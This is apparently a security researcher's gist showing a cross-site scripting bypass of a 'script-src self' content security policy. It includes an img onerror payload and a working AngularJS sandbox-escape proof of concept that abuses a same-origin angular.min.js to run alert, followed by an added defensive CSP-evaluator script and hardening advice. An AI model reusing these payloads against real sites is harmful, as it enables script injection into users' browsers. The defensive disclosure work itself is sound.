Created November 17, 2024 20:53

Xib3rR4dAr created this gist Nov 17, 2024
blob://example.com/3dfab3bd-a892-4448-92c3-de92d8eed2ea

```
<img src=x onerror=alert(1)>
```

```
Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present.
```

angular.min.js

```js
/*
 AngularJS v1.8.3
 (c) 2010-2020 Google LLC. http://angularjs.org
 License: MIT
*/
(function(z)...
```

PoC:

```html
<html>
<head>
<meta charset="utf-8">
<script src="https://example.com/auth/resources/dm3bk/common/keycloak/node_modules/angular/angular.min.js"></script>
</head>
<body>
<div ng-app>
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([112233],alert)'">
</div>
</body>
</html>
```
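The console error above shows why the inline `onerror` handler is refused, while the PoC still runs because `script-src 'self'` trusts every script the origin serves, including a bundled `angular.min.js`. The following is an added example, not part of the gist: a small evaluator that parses a `Content-Security-Policy` header value and reports both conditions for the effective script policy, so a defender can tell a policy that merely blocks inline handlers from one that also stops injected markup from loading same-origin scripts. The two sample headers (`WEAK_POLICY`, matching the directive quoted in the error, and `HARDENED_POLICY` with a made-up nonce) are constructed for the example, and the rules applied are CSP Level 3 semantics: a nonce or hash makes `'unsafe-inline'` ignored, and `'strict-dynamic'` makes `'self'`, host and scheme sources ignored.

```javascript
// Added example (not from the gist): evaluate what a CSP header value allows
// for scripts, under CSP Level 3 semantics.

// Parse "directive src src; directive src" into a Map of directive -> sources.
// The first occurrence of a directive wins; duplicates are ignored.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    const key = name.toLowerCase();
    if (!policy.has(key)) policy.set(key, sources);
  }
  return policy;
}

// script-src governs scripts if present; otherwise default-src does;
// otherwise scripts are unrestricted.
function effectiveScriptSources(policy) {
  return policy.get('script-src') ?? policy.get('default-src') ?? null;
}

function evaluateScriptPolicy(header) {
  const raw = effectiveScriptSources(parseCsp(header));
  if (raw === null) {
    return {
      inlineHandlersBlocked: false,
      selfHostedScriptsLoadable: true,
      strictDynamic: false,
      verdict: 'no script-src or default-src: scripts are unrestricted',
    };
  }
  // Normalise: lower-case and strip the quotes around keyword sources.
  const src = raw.map((s) => s.toLowerCase().replace(/^'(.*)'$/, '$1'));
  const hasNonceOrHash = src.some(
    (s) => s.startsWith('nonce-') || /^sha(256|384|512)-/.test(s),
  );
  const strictDynamic = src.includes('strict-dynamic');
  // 'unsafe-inline' is ignored once a nonce/hash or 'strict-dynamic' is present.
  // (A hash plus 'unsafe-hashes' could still permit one specific handler; not modelled here.)
  const inlineAllowed =
    src.includes('unsafe-inline') && !hasNonceOrHash && !strictDynamic;
  // With 'strict-dynamic', 'self' and host/scheme sources are ignored: only scripts
  // carrying the nonce/hash (and what they load) run. Without it, 'self' lets an
  // injected <script src="..."> pull in anything the origin serves.
  const selfHostedScriptsLoadable = src.includes('self') && !strictDynamic;

  let verdict;
  if (inlineAllowed) {
    verdict = "'unsafe-inline' is honoured: inline event handlers run";
  } else if (selfHostedScriptsLoadable) {
    verdict =
      'inline handlers refused, but injected markup can still load any same-origin script ' +
      '(e.g. a bundled client-side framework); use a nonce with \'strict-dynamic\' and do not ' +
      'leave unused framework bundles reachable on the origin';
  } else {
    verdict = 'inline handlers refused and scripts must carry the nonce/hash';
  }
  return {
    inlineHandlersBlocked: !inlineAllowed,
    selfHostedScriptsLoadable,
    strictDynamic,
    verdict,
  };
}

// Constructed sample headers: the directive quoted in the console error above,
// and a hardened policy with a placeholder nonce (a real one is random per response).
const WEAK_POLICY = "script-src 'self'";
const HARDENED_POLICY =
  "script-src 'nonce-PLACEHOLDER_Gx7Qm2pL9' 'strict-dynamic'; object-src 'none'; base-uri 'none'";

for (const header of [WEAK_POLICY, HARDENED_POLICY]) {
  console.log(header, '=>', evaluateScriptPolicy(header));
}
```

Run with `node` to see both verdicts. One caveat when applying the hardened policy: the nonce must be unpredictable and fresh per response, and every legitimate `<script>` tag must carry it, since with `'strict-dynamic'` the host list no longer matters.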